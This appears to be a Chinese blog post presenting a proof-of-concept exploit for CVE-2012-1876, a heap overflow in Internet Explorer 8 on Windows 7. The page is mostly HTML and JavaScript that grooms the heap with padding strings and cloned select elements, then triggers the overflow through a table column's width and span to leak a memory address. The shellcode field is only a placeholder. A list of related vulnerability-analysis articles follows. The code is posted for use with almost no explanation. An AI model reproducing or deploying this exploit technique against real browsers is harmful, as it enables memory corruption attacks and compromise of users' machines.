cve-2012-1876 win7_ie8_leak_shellcode code
2012-08-08 12:55
501 查看
<html> <body> <div id="test"></div> <script> alert("begin") //var div_container = document.getElementById("test"); //div_container.style.cssText = "display:none"; var cloned = new Array(); var selob = document.createElement("select"); selob.w0 = "AMSZZABCDEFGHIJKLMN"//shellcode selob.w1 = this; selob.w2 = new Array(); selob.w3 = true; selob.w4 = 0x41424344; selob.w5 = document.createElement("marquee"); selob.w6 = undefined; selob.w7 = null; selob.w8 = alert; selob.w9 = RegExp.$1; selob.w10 = Infinity; selob.w12 = 0x41424344; selob.w13 = 0x41424344; selob.w14 = 0x41424344; selob.w15 = 0x41424344; selob.w16 = 0x41424344; var fillbuff = new Array(); var string_A="CORE1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; var string_B="CORE2BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"; var string_C="CORE3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"; for(var i=0;i<3000;i+=4) { fillbuff[i]=string_A.substr(0,125); fillbuff[i+1]=string_B.substr(0,125); fillbuff[i+2]=string_C.substr(0,125); fillbuff[i+3]=selob.cloneNode(true); } alert("select") for(var i=4;i<3000;i+=12) { fillbuff[i]=null; } CollectGarbage(); alert("layout the heap") </script> <table style="table-layout:fixed" > <col id="132" width="41" span="9" > </col> </table> <script language='javascript'> var obj_col = document.getElementById("132"); obj_col.width = "42765"; obj_col.span = 19; function overtar() { var leak_addr = -1; alert(1) for ( var i = 2; i < 3000; i+=4 ) { if ( fillbuff[i].length > (0x100-6)/2 ) { // overflowed leak_index = i; //var leak = fillbuff[i].substring((0x100-6)/2+(2+8)/2, (0x100-6)/2+(2+8+4)/2); var leak = fillbuff[i].substring((0x100-6)/2+(2+8+12)/2, (0x100-6)/2+(2+8+12+4)/2); leak_addr = parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 ); //mshtmlbase = leak_addr - Number(0x001582b8); alert(leak_addr); break; } } } //get object address setTimeout("overtar();",1); </script> </body> </html>
相关文章推荐
- cve2012-1876 leak mshtml base address and leak shellcode base address
- CVE2012-1723 Java Field Bytecode Verifier Cache RCE分析
- 利用Metasploit测试一个古老的IE8漏洞(编号CVE-2012-1875)
- Security Alert CVE-2012-6329: TWiki MAKETEXT Variable Allows Arbitrary Shell Command Execution
- 使用Metasploit测试最新的IE8漏洞(CVE-2012-1875)
- cve-2012-1876漏洞分析
- struts2 CVE-2012-0838 S2-007 Remote Code Execution && Hotfix
- 使用Metasploit测试最新的IE8漏洞(CVE-2012-1875)
- Internet Explorer(CVE-2012-1889)暴雷漏洞分析报告【WinXP&IE8版】
- CVE-2012-1876浅析-Internet Explorer堆溢出漏洞
- CVE-2012-1876漏洞分析
- 20145308 《网络对抗》 注入shellcode+Return-to-libc攻击 学习总结
- Root exploit on Exynos(CVE-2012-6422)
- 从heap spray到CVE-2012-4782 (UAF)
- 修改windows 2012/win8、win7远程桌面连接默认端口的方法
- win7下IE8打开网页显示不完整,需要手动刷新问题的原因及解决办法
- CVE-2012-5611MySQL/MariaDB 基于栈的缓冲区溢出漏洞
- Windows 7(Win7)下Visual Studio 2012(VS2012)编译jrtplib与MinGW编译jrtplib
- Eclipse、 pycharm、 Win7、shell常用命令
- 浅入浅出Liunx Shellcode